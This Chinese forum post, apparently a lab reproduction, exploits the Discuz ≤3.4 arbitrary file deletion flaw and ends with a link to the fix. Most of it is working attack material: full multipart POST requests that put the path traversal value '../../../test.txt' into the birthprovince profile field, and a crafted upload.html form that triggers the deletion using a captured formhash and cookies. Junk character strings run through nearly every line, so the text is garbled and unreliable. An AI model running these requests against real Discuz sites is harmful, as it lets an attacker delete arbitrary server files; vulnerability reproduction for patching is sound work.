|
|
0 r& |2 J( k# L2 S d* ]6 m
: o z) x. o/ X% @# P+ Y* I# |前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
- \* Q. q1 J6 W3 L影响版本:Discuz < =3.4 环境% ?% \0 M; B4 @! d" v6 L
/ w; C9 b s2 W
复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。
6 P4 K3 D. x& R8 B- A+ ?$ a7 N新建test.txt
% u/ f+ B* e, _# [访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。
2 U1 `! f6 T2 ~' K/ Y% ?( _, d2 L
; x" D1 ?0 c. F7 C% o: l6 }' g$ p- k" t! a3 N7 K! n
查看formhash
! c& z/ M; I8 k. C' i7 d: ?利用burp抓包,获取cookie
& A# t5 H0 R) v% c5 ]' T
; ?0 @8 ?6 e J# f8 ^+ K B# ` u. c0 h4 E% S+ W& R
, v6 T& E: ?6 w' F, Z: y0 n# V& `
 $ r/ }% c2 Q; R1 I8 X0 j1 l
) C) x4 l: ?' r) `7 H+ W3 S
抓取cookie2 p) ?9 o8 D" N3 s
. _8 E: S# I2 o3 d& h7 k1 }
发送下面数据包:修改cookie,formhash,还有删除的文件
6 I. w3 n8 |: Y# `POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
! ~+ p3 c1 |7 C' ?# THost: localhost# x8 m( V* E% x" J
Content-Length: 367
9 X$ e- r1 J1 ^& s+ pCache-Control: max-age=08 ~8 C# K0 K2 ~8 J P
Upgrade-Insecure-Requests: 1
C7 y) s# t6 y1 F' A ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
5 T6 i3 R! X) I4 O( r# `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.362 k! ?6 e; F) b- m' h, }3 R- @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.81 H1 |9 ~+ _7 i: W
Accept-Encoding: gzip, deflate
* Q# N# O( ]% q2 m9 FAccept-Language: zh-CN,zh;q=0.8,en;q=0.6
. r3 ` R2 X2 m, @: wCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056" @/ ` ?8 [* [2 o& Z+ X+ @5 h- ?
Connection: close
& j, C! I. r+ C( Z# g/ ]+ ^1 j------WebKitFormBoundaryPFvXyxL45f34L12s4 ?* ?) }* S6 z0 h
Content-Disposition: form-data; name="formhash"* E$ y, @ Q. w/ g( {0 W$ D
84a7f376" L% E# s& \6 U' E6 c
------WebKitFormBoundaryPFvXyxL45f34L12s! z" | s. s: G" L/ T
Content-Disposition: form-data; name="birthprovince"' r. Y1 p6 U" n6 c: i
../../../test.txt
! ~; w8 o+ H4 A1 i------WebKitFormBoundaryPFvXyxL45f34L12s
8 o; w5 s2 V2 F2 gContent-Disposition: form-data; name="profilesubmit"+ K1 M+ c6 L" G3 b4 X: |" k, F
1
) M( F3 x% Z* ^* g# O" z8 n4 z------WebKitFormBoundaryPFvXyxL45f34L12s--
% A9 i' r; Z" ?( N发送删除的数据包9 I( K. {: \; S9 {1 V
刷新页面,查看出生地就会显示成下图所示的状态:
; B7 e" @# Z4 m! \: X" `! ?数据成功写入) I, Y8 d! o3 c! [( z" c7 r
; b: o3 {* `5 N6 g9 N5 _: W1 |5 |! p+ w5 q9 U# F& }
说明数据已经进入数据库:! X7 k$ w0 W) V j5 p" S4 I9 i7 ~
然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:
; f& z3 |0 w' t& s8 \+ Y% W1 g<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">
; Y- n# V6 I* l9 ?<input type="file"name="birthprovince" id="file" />. Y @% b! V# X/ g4 x
<input type="text"name="formhash" value="84a7f376"/></p>2 \5 s" C1 d- C* Q6 a+ @' U
<input type="text"name="profilesubmit" value="1"/></p>0 e* t. X' `2 b: b6 y
<input type="submit"value="Submit" />
2 k( y& y- ?1 F! }7 g1 G</from>" @) T) O7 ~. G* R! r, i3 O/ n
7 y6 P" K% Q1 h, S+ @: ~ i5 c8 g+ z* }. z8 m3 j6 x( _: W
4 F0 _# y( ?6 H# o
) Q% R4 V; D; x) v3 ]! f0 r
3 O+ G1 K! C% y1 J- Q$ _* Q: p9 \8 R或者直接构建数据包:
K. \! }; p) V2 u( PPOST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
% T" g9 g9 d0 T" H0 B- a" k: gHost: 192.168.220.131. l$ V6 o- r! w0 N7 i# V! F% I! _& I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
; o% }6 f5 `$ ?$ ~2 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
: G4 ~/ l; M. TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 y0 r% v/ V& e1 O- U
Accept-Encoding: gzip, deflate: W. A' G' L6 n
Content-Type: multipart/form-data; boundary=---------------------------1238217421187166 K% H7 ]9 N: ]% ^0 E
Content-Length: 91989+ a7 G F Y9 T3 D$ s- T; W! \
Connection: close | F; v4 v) W! C. @
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
5 ]: p* h. f; {7 m4 dUpgrade-Insecure-Requests: 12 w2 v9 L1 m" f& ^
-----------------------------123821742118716
. u7 L3 P7 Y, L0 v/ O$ c" P1 _Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"5 K# L1 c; d( I) D+ ~
Content-Type: image/jpeg% f( o. u# U5 s4 A3 x' o. F: r. e
zerba(这里写啥都可以)7 ]# Y. M, A$ C3 ~
-----------------------------123821742118716--
/ y' N; Y0 j$ q9 A$ |: j, M; E/ [. U2 i) k8 i* d/ F7 h1 e }
9 [6 }, F' D2 L8 h. I; a$ v" e
( W3 p! e) c* y( U. L" O+ ~3 d* @/ e$ A- N/ }& m4 g
9 O2 V1 p7 `# t) l, r; ^" m* t" ], |: h, ~( {# ^- H1 ]
; s3 n$ \+ X3 ?4 S
' L7 G; J0 I! f+ E' g0 C2 @6 v! C$ l' E! \# @0 R
) l: ~4 N, u$ a5 D* s
# |& V& b- h7 k" Z2 S5 p1 A+ H6 J3 y进去discuz看看,可以看到,test.txt文件已经被删除了。8 g, k- M+ [/ n4 `/ H3 [
, N7 Y# r% V' E8 b: m9 }
; }# [- z6 Q5 v! T$ t3 d/ w- i. S8 Y% y; v9 {' B
0 Y0 e9 _" h- t# O0 Y0 `( M: V* {
$ t% a: y8 G0 b, N
修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574$ H: m( Q* y) k8 C/ i+ V
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
' Z4 I, F: @2 D1 E2 O1 K8 U( t: H
! [+ A: U+ h( {2 v, W
3 A+ i h& l3 i
/ }8 i/ [& L9 b& X' a+ g- e- u! l: R% B5 V$ m! Y. c( d
) V; Y- f! n/ O4 E' C7 x
* Z! I9 J- o( ]& R \ o9 r% [! u
" _/ P5 q, Y! U) ^' H9 K2 O1 A, ~' ]( D8 I
# g1 ^9 n6 @ S* B3 N# I |
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜